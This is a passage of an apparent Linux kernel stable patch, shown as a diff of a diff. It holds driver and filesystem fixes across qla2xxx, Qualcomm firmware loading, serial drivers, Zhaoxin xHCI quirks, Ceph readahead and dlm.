+ 		    "qla2x00_start_nvme_mq failed = %d\n", rval);
+-		wake_up(&sp->nvme_ls_waitq);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+ 		qla2xxx_rel_qpair_sp(sp->qpair, sp);
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 08dc825fbf4f6..ed70eb8847864 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -1068,43 +1068,6 @@ qc24_fail_command:
+ 	return 0;
+ }
+ 
+-/*
+- * qla2x00_eh_wait_on_command
+- *    Waits for the command to be returned by the Firmware for some
+- *    max time.
+- *
+- * Input:
+- *    cmd = Scsi Command to wait on.
+- *
+- * Return:
+- *    Completed in time : QLA_SUCCESS
+- *    Did not complete in time : QLA_FUNCTION_FAILED
+- */
+-static int
+-qla2x00_eh_wait_on_command(struct scsi_cmnd *cmd)
+-{
+-#define ABORT_POLLING_PERIOD	1000
+-#define ABORT_WAIT_ITER		((2 * 1000) / (ABORT_POLLING_PERIOD))
+-	unsigned long wait_iter = ABORT_WAIT_ITER;
+-	scsi_qla_host_t *vha = shost_priv(cmd->device->host);
+-	struct qla_hw_data *ha = vha->hw;
+-	srb_t *sp = scsi_cmd_priv(cmd);
+-	int ret = QLA_SUCCESS;
+-
+-	if (unlikely(pci_channel_offline(ha->pdev)) || ha->flags.eeh_busy) {
+-		ql_dbg(ql_dbg_taskm, vha, 0x8005,
+-		    "Return:eh_wait.\n");
+-		return ret;
+-	}
+-
+-	while (sp->type && wait_iter--)
+-		msleep(ABORT_POLLING_PERIOD);
+-	if (sp->type)
+-		ret = QLA_FUNCTION_FAILED;
+-
+-	return ret;
+-}
+-
+ /*
+  * qla2x00_wait_for_hba_online
+  *    Wait till the HBA is online after going through
+@@ -1355,6 +1318,9 @@ qla2xxx_eh_abort(struct scsi_cmnd *cmd)
+ 	return ret;
+ }
+ 
++#define ABORT_POLLING_PERIOD	1000
++#define ABORT_WAIT_ITER		((2 * 1000) / (ABORT_POLLING_PERIOD))
++
+ /*
+  * Returns: QLA_SUCCESS or QLA_FUNCTION_FAILED.
+  */
+@@ -1368,41 +1334,73 @@ __qla2x00_eh_wait_for_pending_commands(struct qla_qpair *qpair, unsigned int t,
+ 	struct req_que *req = qpair->req;
+ 	srb_t *sp;
+ 	struct scsi_cmnd *cmd;
++	unsigned long wait_iter = ABORT_WAIT_ITER;
++	bool found;
++	struct qla_hw_data *ha = vha->hw;
+ 
+ 	status = QLA_SUCCESS;
+ 
+-	spin_lock_irqsave(qpair->qp_lock_ptr, flags);
+-	for (cnt = 1; status == QLA_SUCCESS &&
+-		cnt < req->num_outstanding_cmds; cnt++) {
+-		sp = req->outstanding_cmds[cnt];
+-		if (!sp)
+-			continue;
+-		if (sp->type != SRB_SCSI_CMD)
+-			continue;
+-		if (vha->vp_idx != sp->vha->vp_idx)
+-			continue;
+-		match = 0;
+-		cmd = GET_CMD_SP(sp);
+-		switch (type) {
+-		case WAIT_HOST:
+-			match = 1;
+-			break;
+-		case WAIT_TARGET:
+-			match = cmd->device->id == t;
+-			break;
+-		case WAIT_LUN:
+-			match = (cmd->device->id == t &&
+-				cmd->device->lun == l);
+-			break;
+-		}
+-		if (!match)
+-			continue;
++	while (wait_iter--) {
++		found = false;
+ 
+-		spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
+-		status = qla2x00_eh_wait_on_command(cmd);
+ 		spin_lock_irqsave(qpair->qp_lock_ptr, flags);
++		for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
++			sp = req->outstanding_cmds[cnt];
++			if (!sp)
++				continue;
++			if (sp->type != SRB_SCSI_CMD)
++				continue;
++			if (vha->vp_idx != sp->vha->vp_idx)
++				continue;
++			match = 0;
++			cmd = GET_CMD_SP(sp);
++			switch (type) {
++			case WAIT_HOST:
++				match = 1;
++				break;
++			case WAIT_TARGET:
++				if (sp->fcport)
++					match = sp->fcport->d_id.b24 == t;
++				else
++					match = 0;
++				break;
++			case WAIT_LUN:
++				if (sp->fcport)
++					match = (sp->fcport->d_id.b24 == t &&
++						cmd->device->lun == l);
++				else
++					match = 0;
++				break;
++			}
++			if (!match)
++				continue;
++
++			spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
++			if (unlikely(pci_channel_offline(ha->pdev)) ||
++			    ha->flags.eeh_busy) {
++				ql_dbg(ql_dbg_taskm, vha, 0x8005,
++				    "Return:eh_wait.\n");
++				return status;
++			}
++
++			/*
++			 * SRB_SCSI_CMD is still in the outstanding_cmds array.
++			 * It means scsi_done has not been called. Wait for it to
++			 * clear from outstanding_cmds.
++			 */
++			msleep(ABORT_POLLING_PERIOD);
++			spin_lock_irqsave(qpair->qp_lock_ptr, flags);
++			found = true;
++		}
++		spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
++		if (!found)
++			break;
+ 	}
+-	spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
++	if (wait_iter == -1)
++		status = QLA_FUNCTION_FAILED;
+ 
+ 	return status;
+ }
+@@ -5076,7 +5074,8 @@ struct scsi_qla_host *qla2x00_create_host(struct scsi_host_template *sht,
+ 	}
+ 	INIT_DELAYED_WORK(&vha->scan.scan_work, qla_scan_work_fn);
+ 
+-	sprintf(vha->host_str, "%s_%lu", QLA2XXX_DRIVER_NAME, vha->host_no);
++	snprintf(vha->host_str, sizeof(vha->host_str), "%s_%lu",
++		 QLA2XXX_DRIVER_NAME, vha->host_no);
+ 	ql_dbg(ql_dbg_init, vha, 0x0041,
+ 	    "Allocated the host=%p hw=%p vha=%p dev_name=%s",
+ 	    vha->host, vha->hw, vha,
+diff --git a/drivers/soc/qcom/mdt_loader.c b/drivers/soc/qcom/mdt_loader.c
+index 3f11554df2f38..10235b36d1312 100644
+--- a/drivers/soc/qcom/mdt_loader.c
++++ b/drivers/soc/qcom/mdt_loader.c
+@@ -210,6 +210,7 @@ int qcom_mdt_pas_init(struct device *dev, const struct firmware *fw,
+ 	const struct elf32_hdr *ehdr;
+ 	phys_addr_t min_addr = PHYS_ADDR_MAX;
+ 	phys_addr_t max_addr = 0;
++	bool relocate = false;
+ 	size_t metadata_len;
+ 	void *metadata;
+ 	int ret;
+@@ -224,6 +225,9 @@ int qcom_mdt_pas_init(struct device *dev, const struct firmware *fw,
+ 		if (!mdt_phdr_valid(phdr))
+ 			continue;
+ 
++		if (phdr->p_flags & QCOM_MDT_RELOCATABLE)
++			relocate = true;
++
+ 		if (phdr->p_paddr < min_addr)
+ 			min_addr = phdr->p_paddr;
+ 
+@@ -246,11 +250,13 @@ int qcom_mdt_pas_init(struct device *dev, const struct firmware *fw,
+ 		goto out;
+ 	}
+ 
+-	ret = qcom_scm_pas_mem_setup(pas_id, mem_phys, max_addr - min_addr);
+-	if (ret) {
+-		/* Unable to set up relocation */
+-		dev_err(dev, "error %d setting up firmware %s\n", ret, fw_name);
+-		goto out;
++	if (relocate) {
++		ret = qcom_scm_pas_mem_setup(pas_id, mem_phys, max_addr - min_addr);
++		if (ret) {
++			/* Unable to set up relocation */
++			dev_err(dev, "error %d setting up firmware %s\n", ret, fw_name);
++			goto out;
++		}
+ 	}
+ 
+ out:
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index b2eb3090f4b46..08934d27f709e 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -167,7 +167,8 @@ struct qcom_swrm_ctrl {
+ 	u32 intr_mask;
+ 	u8 rcmd_id;
+ 	u8 wcmd_id;
+-	struct qcom_swrm_port_config pconfig[QCOM_SDW_MAX_PORTS];
++	/* Port numbers are 1 - 14 */
++	struct qcom_swrm_port_config pconfig[QCOM_SDW_MAX_PORTS + 1];
+ 	struct sdw_stream_runtime *sruntime[SWRM_MAX_DAIS];
+ 	enum sdw_slave_status status[SDW_MAX_DEVICES + 1];
+ 	int (*reg_read)(struct qcom_swrm_ctrl *ctrl, int reg, u32 *val);
+diff --git a/drivers/tty/serial/8250/8250.h b/drivers/tty/serial/8250/8250.h
+index 1e8fe44a7099f..eeb7b43ebe539 100644
+--- a/drivers/tty/serial/8250/8250.h
++++ b/drivers/tty/serial/8250/8250.h
+@@ -91,7 +91,6 @@ struct serial8250_config {
+ #define UART_BUG_TXEN	BIT(1)	/* UART has buggy TX IIR status */
+ #define UART_BUG_NOMSR	BIT(2)	/* UART has buggy MSR status bits (Au1x00) */
+ #define UART_BUG_THRE	BIT(3)	/* UART has buggy THRE reassertion */
+-#define UART_BUG_PARITY	BIT(4)	/* UART mishandles parity if FIFO enabled */
+ #define UART_BUG_TXRACE	BIT(5)	/* UART Tx fails to set remote DR */
+ 
+ 
+diff --git a/drivers/tty/serial/8250/8250_pci.c b/drivers/tty/serial/8250/8250_pci.c
+index cd27821f54ec2..0ea89df6702f6 100644
+--- a/drivers/tty/serial/8250/8250_pci.c
++++ b/drivers/tty/serial/8250/8250_pci.c
+@@ -1252,14 +1252,6 @@ static int pci_oxsemi_tornado_setup(struct serial_private *priv,
+ 	return pci_default_setup(priv, board, up, idx);
+ }
+ 
+-static int pci_asix_setup(struct serial_private *priv,
+-		  const struct pciserial_board *board,
+-		  struct uart_8250_port *port, int idx)
+-{
+-	port->bugs |= UART_BUG_PARITY;
+-	return pci_default_setup(priv, board, port, idx);
+-}
+-
+ #define QPCR_TEST_FOR1		0x3F
+ #define QPCR_TEST_GET1		0x00
+ #define QPCR_TEST_FOR2		0x40
+@@ -1975,7 +1967,6 @@ pci_moxa_setup(struct serial_private *priv,
+ #define PCI_DEVICE_ID_WCH_CH355_4S	0x7173
+ #define PCI_VENDOR_ID_AGESTAR		0x5372
+ #define PCI_DEVICE_ID_AGESTAR_9375	0x6872
+-#define PCI_VENDOR_ID_ASIX		0x9710
+ #define PCI_DEVICE_ID_BROADCOM_TRUMANAGE 0x160a
+ #define PCI_DEVICE_ID_AMCC_ADDIDATA_APCI7800 0x818e
+ 
+@@ -2620,16 +2611,6 @@ static struct pci_serial_quirk pci_serial_quirks[] = {
+ 		.exit		= pci_wch_ch38x_exit,
+ 		.setup          = pci_wch_ch38x_setup,
+ 	},
+-	/*
+-	 * ASIX devices with FIFO bug
+-	 */
+-	{
+-		.vendor		= PCI_VENDOR_ID_ASIX,
+-		.device		= PCI_ANY_ID,
+-		.subvendor	= PCI_ANY_ID,
+-		.subdevice	= PCI_ANY_ID,
+-		.setup		= pci_asix_setup,
+-	},
+ 	/*
+ 	 * Broadcom TruManage (NetXtreme)
+ 	 */
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index b8e8a96c3eb63..acf578aa9930b 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -2629,11 +2629,8 @@ static unsigned char serial8250_compute_lcr(struct uart_8250_port *up,
+ 
+ 	if (c_cflag & CSTOPB)
+ 		cval |= UART_LCR_STOP;
+-	if (c_cflag & PARENB) {
++	if (c_cflag & PARENB)
+ 		cval |= UART_LCR_PARITY;
+-		if (up->bugs & UART_BUG_PARITY)
+-			up->fifo_bug = true;
+-	}
+ 	if (!(c_cflag & PARODD))
+ 		cval |= UART_LCR_EPAR;
+ 	if (c_cflag & CMSPAR)
+@@ -2794,8 +2791,7 @@ serial8250_do_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	up->lcr = cval;					/* Save computed LCR */
+ 
+ 	if (up->capabilities & UART_CAP_FIFO && port->fifosize > 1) {
+-		/* NOTE: If fifo_bug is not set, a user can set RX_trigger. */
+-		if ((baud < 2400 && !up->dma) || up->fifo_bug) {
++		if (baud < 2400 && !up->dma) {
+ 			up->fcr &= ~UART_FCR_TRIGGER_MASK;
+ 			up->fcr |= UART_FCR_TRIGGER_1;
+ 		}
+@@ -3131,8 +3127,7 @@ static int do_set_rxtrig(struct tty_port *port, unsigned char bytes)
+ 	struct uart_8250_port *up = up_to_u8250p(uport);
+ 	int rxtrig;
+ 
+-	if (!(up->capabilities & UART_CAP_FIFO) || uport->fifosize <= 1 ||
+-	    up->fifo_bug)
++	if (!(up->capabilities & UART_CAP_FIFO) || uport->fifosize <= 1)
+ 		return -EINVAL;
+ 
+ 	rxtrig = bytes_to_fcr_rxtrig(up, bytes);
+diff --git a/drivers/tty/serial/atmel_serial.c b/drivers/tty/serial/atmel_serial.c
+index cff64e5edee26..fbce8ef205ce6 100644
+--- a/drivers/tty/serial/atmel_serial.c
++++ b/drivers/tty/serial/atmel_serial.c
+@@ -880,11 +880,11 @@ static void atmel_complete_tx_dma(void *arg)
+ 
+ 	port->icount.tx += atmel_port->tx_len;
+ 
+-	spin_lock_irq(&atmel_port->lock_tx);
++	spin_lock(&atmel_port->lock_tx);
+ 	async_tx_ack(atmel_port->desc_tx);
+ 	atmel_port->cookie_tx = -EINVAL;
+ 	atmel_port->desc_tx = NULL;
+-	spin_unlock_irq(&atmel_port->lock_tx);
++	spin_unlock(&atmel_port->lock_tx);
+ 
+ 	if (uart_circ_chars_pending(xmit) < WAKEUP_CHARS)
+ 		uart_write_wakeup(port);
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index f07c4f9ff13c0..d2137f6eff327 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -397,6 +397,16 @@ static void start_hrtimer_ms(struct hrtimer *hrt, unsigned long msec)
+        hrtimer_start(hrt, ms_to_ktime(msec), HRTIMER_MODE_REL);
+ }
+ 
++static void imx_uart_disable_loopback_rs485(struct imx_port *sport)
++{
++	unsigned int uts;
++
++	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
++	uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
++	uts &= ~UTS_LOOP;
++	imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++}
++
+ /* called with port.lock taken and irqs off */
+ static void imx_uart_start_rx(struct uart_port *port)
+ {
+@@ -418,6 +428,7 @@ static void imx_uart_start_rx(struct uart_port *port)
+ 	/* Write UCR2 first as it includes RXEN */
+ 	imx_uart_writel(sport, ucr2, UCR2);
+ 	imx_uart_writel(sport, ucr1, UCR1);
++	imx_uart_disable_loopback_rs485(sport);
+ }
+ 
+ /* called with port.lock taken and irqs off */
+@@ -1404,7 +1415,7 @@ static int imx_uart_startup(struct uart_port *port)
+ 	int retval, i;
+ 	unsigned long flags;
+ 	int dma_is_inited = 0;
+-	u32 ucr1, ucr2, ucr3, ucr4, uts;
++	u32 ucr1, ucr2, ucr3, ucr4;
+ 
+ 	retval = clk_prepare_enable(sport->clk_per);
+ 	if (retval)
+@@ -1509,10 +1520,7 @@ static int imx_uart_startup(struct uart_port *port)
+ 		imx_uart_writel(sport, ucr2, UCR2);
+ 	}
+ 
+-	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
+-	uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
+-	uts &= ~UTS_LOOP;
+-	imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++	imx_uart_disable_loopback_rs485(sport);
+ 
+ 	spin_unlock_irqrestore(&sport->port.lock, flags);
+ 
+diff --git a/drivers/tty/serial/samsung_tty.c b/drivers/tty/serial/samsung_tty.c
+index 77d1363029f55..aa2c51b84116f 100644
+--- a/drivers/tty/serial/samsung_tty.c
++++ b/drivers/tty/serial/samsung_tty.c
+@@ -1467,8 +1467,12 @@ static unsigned int s3c24xx_serial_getclk(struct s3c24xx_uart_port *ourport,
+ 			continue;
+ 
+ 		rate = clk_get_rate(clk);
+-		if (!rate)
++		if (!rate) {
++			dev_err(ourport->port.dev,
++				"Failed to get clock rate for %s.\n", clkname);
++			clk_put(clk);
+ 			continue;
++		}
+ 
+ 		if (ourport->info->has_divslot) {
+ 			unsigned long div = rate / req_baud;
+@@ -1494,10 +1498,18 @@ static unsigned int s3c24xx_serial_getclk(struct s3c24xx_uart_port *ourport,
+ 			calc_deviation = -calc_deviation;
+ 
+ 		if (calc_deviation < deviation) {
++			/*
++			 * If we find a better clk, release the previous one, if
++			 * any.
++			 */
++			if (!IS_ERR(*best_clk))
++				clk_put(*best_clk);
+ 			*best_clk = clk;
+ 			best_quot = quot;
+ 			*clk_num = cnt;
+ 			deviation = calc_deviation;
++		} else {
++			clk_put(clk);
+ 		}
+ 	}
+ 
+diff --git a/drivers/ufs/host/Kconfig b/drivers/ufs/host/Kconfig
+index 4cc2dbd79ed0e..9b39fd76031be 100644
+--- a/drivers/ufs/host/Kconfig
++++ b/drivers/ufs/host/Kconfig
+@@ -71,6 +71,7 @@ config SCSI_UFS_QCOM
+ config SCSI_UFS_MEDIATEK
+ 	tristate "Mediatek specific hooks to UFS controller platform driver"
+ 	depends on SCSI_UFSHCD_PLATFORM && ARCH_MEDIATEK
++	depends on RESET_CONTROLLER
+ 	select PHY_MTK_UFS
+ 	select RESET_TI_SYSCON
+ 	help
+diff --git a/drivers/usb/host/xhci-mem.c b/drivers/usb/host/xhci-mem.c
+index 81ca2bc1f0bef..019dcbe55dbdc 100644
+--- a/drivers/usb/host/xhci-mem.c
++++ b/drivers/usb/host/xhci-mem.c
+@@ -2116,7 +2116,7 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ {
+ 	u32 temp, port_offset, port_count;
+ 	int i;
+-	u8 major_revision, minor_revision;
++	u8 major_revision, minor_revision, tmp_minor_revision;
+ 	struct xhci_hub *rhub;
+ 	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
+ 	struct xhci_port_cap *port_cap;
+@@ -2136,6 +2136,15 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 		 */
+ 		if (minor_revision > 0x00 && minor_revision < 0x10)
+ 			minor_revision <<= 4;
++		/*
++		 * Some Zhaoxin xHCI controllers follow the USB 3.1 spec
++		 * but only support Gen1.
++		 */
++		if (xhci->quirks & XHCI_ZHAOXIN_HOST) {
++			tmp_minor_revision = minor_revision;
++			minor_revision = 0;
++		}
++
+ 	} else if (major_revision <= 0x02) {
+ 		rhub = &xhci->usb2_rhub;
+ 	} else {
+@@ -2145,10 +2154,6 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 		/* Ignoring port protocol we can't understand. FIXME */
+ 		return;
+ 	}
+-	rhub->maj_rev = XHCI_EXT_PORT_MAJOR(temp);
+-
+-	if (rhub->min_rev < minor_revision)
+-		rhub->min_rev = minor_revision;
+ 
+ 	/* Port offset and count in the third dword, see section 7.2 */
+ 	temp = readl(addr + 2);
+@@ -2167,8 +2172,6 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 	if (xhci->num_port_caps > max_caps)
+ 		return;
+ 
+-	port_cap->maj_rev = major_revision;
+-	port_cap->min_rev = minor_revision;
+ 	port_cap->psi_count = XHCI_EXT_PORT_PSIC(temp);
+ 
+ 	if (port_cap->psi_count) {
+@@ -2189,6 +2192,11 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 				  XHCI_EXT_PORT_PSIV(port_cap->psi[i - 1])))
+ 				port_cap->psi_uid_count++;
+ 
++			if (xhci->quirks & XHCI_ZHAOXIN_HOST &&
++			    major_revision == 0x03 &&
++			    XHCI_EXT_PORT_PSIV(port_cap->psi[i]) >= 5)
++				minor_revision = tmp_minor_revision;
++
+ 			xhci_dbg(xhci, "PSIV:%d PSIE:%d PLT:%d PFD:%d LP:%d PSIM:%d\n",
+ 				  XHCI_EXT_PORT_PSIV(port_cap->psi[i]),
+ 				  XHCI_EXT_PORT_PSIE(port_cap->psi[i]),
+@@ -2198,6 +2206,15 @@ static void xhci_add_in_port(struct xhci_hcd *xhci, unsigned int num_ports,
+ 				  XHCI_EXT_PORT_PSIM(port_cap->psi[i]));
+ 		}
+ 	}
++
++	rhub->maj_rev = major_revision;
++
++	if (rhub->min_rev < minor_revision)
++		rhub->min_rev = minor_revision;
++
++	port_cap->maj_rev = major_revision;
++	port_cap->min_rev = minor_revision;
++
+ 	/* cache usb2 port capabilities */
+ 	if (major_revision < 0x03 && xhci->num_ext_caps < max_caps)
+ 		xhci->ext_caps[xhci->num_ext_caps++] = temp;
+@@ -2439,8 +2456,12 @@ int xhci_mem_init(struct xhci_hcd *xhci, gfp_t flags)
+ 	 * and our use of dma addresses in the trb_address_map radix tree needs
+ 	 * TRB_SEGMENT_SIZE alignment, so we pick the greater alignment need.
+ 	 */
+-	xhci->segment_pool = dma_pool_create("xHCI ring segments", dev,
+-			TRB_SEGMENT_SIZE, TRB_SEGMENT_SIZE, xhci->page_size);
++	if (xhci->quirks & XHCI_ZHAOXIN_TRB_FETCH)
++		xhci->segment_pool = dma_pool_create("xHCI ring segments", dev,
++				TRB_SEGMENT_SIZE * 2, TRB_SEGMENT_SIZE * 2, xhci->page_size * 2);
++	else
++		xhci->segment_pool = dma_pool_create("xHCI ring segments", dev,
++				TRB_SEGMENT_SIZE, TRB_SEGMENT_SIZE, xhci->page_size);
+ 
+ 	/* See Table 46 and Note on Figure 55 */
+ 	xhci->device_pool = dma_pool_create("xHCI input/output contexts", dev,
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 6e4dac71c409e..5e72d02042ced 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -335,6 +335,18 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 	     pdev->device == PCI_DEVICE_ID_AMD_PROMONTORYA_4))
+ 		xhci->quirks |= XHCI_NO_SOFT_RETRY;
+ 
++	if (pdev->vendor == PCI_VENDOR_ID_ZHAOXIN) {
++		xhci->quirks |= XHCI_ZHAOXIN_HOST;
++
++		if (pdev->device == 0x9202) {
++			xhci->quirks |= XHCI_RESET_ON_RESUME;
++			xhci->quirks |= XHCI_ZHAOXIN_TRB_FETCH;
++		}
++
++		if (pdev->device == 0x9203)
++			xhci->quirks |= XHCI_ZHAOXIN_TRB_FETCH;
++	}
++
+ 	/* xHC spec requires PCI devices to support D3hot and D3cold */
+ 	if (xhci->hci_version >= 0x120)
+ 		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index 6348cacdc65ef..1354310cb37b1 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1899,6 +1899,8 @@ struct xhci_hcd {
+ #define XHCI_EP_CTX_BROKEN_DCS	BIT_ULL(42)
+ #define XHCI_SUSPEND_RESUME_CLKS	BIT_ULL(43)
+ #define XHCI_RESET_TO_DEFAULT	BIT_ULL(44)
++#define XHCI_ZHAOXIN_TRB_FETCH	BIT_ULL(45)
++#define XHCI_ZHAOXIN_HOST	BIT_ULL(46)
+ 
+ 	unsigned int		num_active_eps;
+ 	unsigned int		limit_active_eps;
+diff --git a/fs/ceph/addr.c b/fs/ceph/addr.c
+index 478c03bfba663..dd2ce7fabbaee 100644
+--- a/fs/ceph/addr.c
++++ b/fs/ceph/addr.c
+@@ -187,16 +187,42 @@ static void ceph_netfs_expand_readahead(struct netfs_io_request *rreq)
+ 	struct inode *inode = rreq->inode;
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_file_layout *lo = &ci->i_layout;
++	unsigned long max_pages = inode->i_sb->s_bdi->ra_pages;
++	loff_t end = rreq->start + rreq->len, new_end;
++	struct ceph_netfs_request_data *priv = rreq->netfs_priv;
++	unsigned long max_len;
+ 	u32 blockoff;
+-	u64 blockno;
+ 
+-	/* Expand the start downward */
+-	blockno = div_u64_rem(rreq->start, lo->stripe_unit, &blockoff);
+-	rreq->start = blockno * lo->stripe_unit;
+-	rreq->len += blockoff;
++	if (priv) {
++		/* Readahead is disabled by posix_fadvise POSIX_FADV_RANDOM */
++		if (priv->file_ra_disabled)
++			max_pages = 0;
++		else
++			max_pages = priv->file_ra_pages;
++
++	}
+ 
+-	/* Now, round up the length to the next block */
+-	rreq->len = roundup(rreq->len, lo->stripe_unit);
++	/* Readahead is disabled */
++	if (!max_pages)
++		return;
++
++	max_len = max_pages << PAGE_SHIFT;
++
++	/*
++	 * Try to expand the length forward by rounding it up to the next
++	 * block, but do not exceed the file size, unless the original
++	 * request already exceeds it.
++	 */
++	new_end = min(round_up(end, lo->stripe_unit), rreq->i_size);
++	if (new_end > end && new_end <= rreq->start + max_len)
++		rreq->len = new_end - rreq->start;
++
++	/* Try to expand the start downward */
++	div_u64_rem(rreq->start, lo->stripe_unit, &blockoff);
++	if (rreq->len + blockoff <= max_len) {
++		rreq->start -= blockoff;
++		rreq->len += blockoff;
++	}
+ }
+ 
+ static bool ceph_netfs_clamp_length(struct netfs_io_subrequest *subreq)
+@@ -362,18 +388,28 @@ static int ceph_init_request(struct netfs_io_request *rreq, struct file *file)
+ {
+ 	struct inode *inode = rreq->inode;
+ 	int got = 0, want = CEPH_CAP_FILE_CACHE;
++	struct ceph_netfs_request_data *priv;
+ 	int ret = 0;
+ 
+ 	if (rreq->origin != NETFS_READAHEAD)
+ 		return 0;
+ 
++	priv = kzalloc(sizeof(*priv), GFP_NOFS);
++	if (!priv)
++		return -ENOMEM;
++
+ 	if (file) {
+ 		struct ceph_rw_context *rw_ctx;
+ 		struct ceph_file_info *fi = file->private_data;
+ 
++		priv->file_ra_pages = file->f_ra.ra_pages;
++		priv->file_ra_disabled = file->f_mode & FMODE_RANDOM;
++
+ 		rw_ctx = ceph_find_rw_context(fi);
+-		if (rw_ctx)
++		if (rw_ctx) {
++			rreq->netfs_priv = priv;
+ 			return 0;
++		}
+ 	}
+ 
+ 	/*
+@@ -383,27 +419,40 @@ static int ceph_init_request(struct netfs_io_request *rreq, struct file *file)
+ 	ret = ceph_try_get_caps(inode, CEPH_CAP_FILE_RD, want, true, &got);
+ 	if (ret < 0) {
+ 		dout("start_read %p, error getting cap\n", inode);
+-		return ret;
++		goto out;
+ 	}
+ 
+ 	if (!(got & want)) {
+ 		dout("start_read %p, no cache cap\n", inode);
+-		return -EACCES;
++		ret = -EACCES;
++		goto out;
++	}
++	if (ret == 0) {
++		ret = -EACCES;
++		goto out;
+ 	}
+-	if (ret == 0)
+-		return -EACCES;
+ 
+-	rreq->netfs_priv = (void *)(uintptr_t)got;
+-	return 0;
++	priv->caps = got;
++	rreq->netfs_priv = priv;
++
++out:
++	if (ret < 0)
++		kfree(priv);
++
++	return ret;
+ }
+ 
+ static void ceph_netfs_free_request(struct netfs_io_request *rreq)
+ {
+-	struct ceph_inode_info *ci = ceph_inode(rreq->inode);
+-	int got = (uintptr_t)rreq->netfs_priv;
++	struct ceph_netfs_request_data *priv = rreq->netfs_priv;
++
++	if (!priv)
++		return;
+ 
+-	if (got)
+-		ceph_put_cap_refs(ci, got);
++	if (priv->caps)
++		ceph_put_cap_refs(ceph_inode(rreq->inode), priv->caps);
++	kfree(priv);
++	rreq->netfs_priv = NULL;
+ }
+ 
+ const struct netfs_request_ops ceph_netfs_ops = {
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index cdb26aadae125..4a9ad5ff726d4 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -3561,6 +3561,15 @@ static void handle_cap_grant(struct inode *inode,
+ 	}
+ 	BUG_ON(cap->issued & ~cap->implemented);
+ 
++	/* don't let check_caps skip sending a response to MDS for revoke msgs */
++	if (le32_to_cpu(grant->op) == CEPH_CAP_OP_REVOKE) {
++		cap->mds_wanted = 0;
++		if (cap == ci->i_auth_cap)
++			check_caps = 1; /* check auth cap only */
++		else
++			check_caps = 2; /* check all caps */
++	}
++
+ 	if (extra_info->inline_version > 0 &&
+ 	    extra_info->inline_version >= ci->i_inline_version) {
+ 		ci->i_inline_version = extra_info->inline_version;
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 478b741b11075..562f42f4a77d7 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -451,6 +451,19 @@ struct ceph_inode_info {
+ 	unsigned long  i_work_mask;
+ };
+ 
++struct ceph_netfs_request_data {
++	int caps;
++
++	/*
++	 * Maximum size of a file readahead request.
++	 * The fadvise could update the bdi's default ra_pages.
++	 */
++	unsigned int file_ra_pages;
++
++	/* Set it if fadvise disables file readahead entirely */
++	bool file_ra_disabled;
++};
++
+ static inline struct ceph_inode_info *
+ ceph_inode(const struct inode *inode)
+ {
+diff --git a/fs/dlm/lockspace.c b/fs/dlm/lockspace.c
+index 7b29ea7bfb416..23cf9b8f31b74 100644
+--- a/fs/dlm/lockspace.c
++++ b/fs/dlm/lockspace.c
+@@ -958,15 +958,3 @@ void dlm_stop_lockspaces(void)
+ 		log_print("dlm user daemon left %d lockspaces", count);
+ }
+ 
+-void dlm_stop_lockspaces_check(void)
+-{
+-	struct dlm_ls *ls;
+-
+-	spin_lock(&lslist_lock);
+-	list_for_each_entry(ls, &lslist, ls_list) {
+-		if (WARN_ON(!rwsem_is_locked(&ls->ls_in_recovery) ||
+-			    !dlm_locking_stopped(ls)))
+-			break;
+-	}
+-	spin_unlock(&lslist_lock);
+-}
+diff --git a/fs/dlm/lockspace.h b/fs/dlm/lockspace.h
+index 03f4a4a3a871c..47ebd44119264 100644
+--- a/fs/dlm/lockspace.h
++++ b/fs/dlm/lockspace.h
+@@ -27,7 +27,6 @@ struct dlm_ls *dlm_find_lockspace_local(void *id);
+ struct dlm_ls *dlm_find_lockspace_device(int minor);
+ void dlm_put_lockspace(struct dlm_ls *ls);
+ void dlm_stop_lockspaces(void);
+-void dlm_stop_lockspaces_check(void);
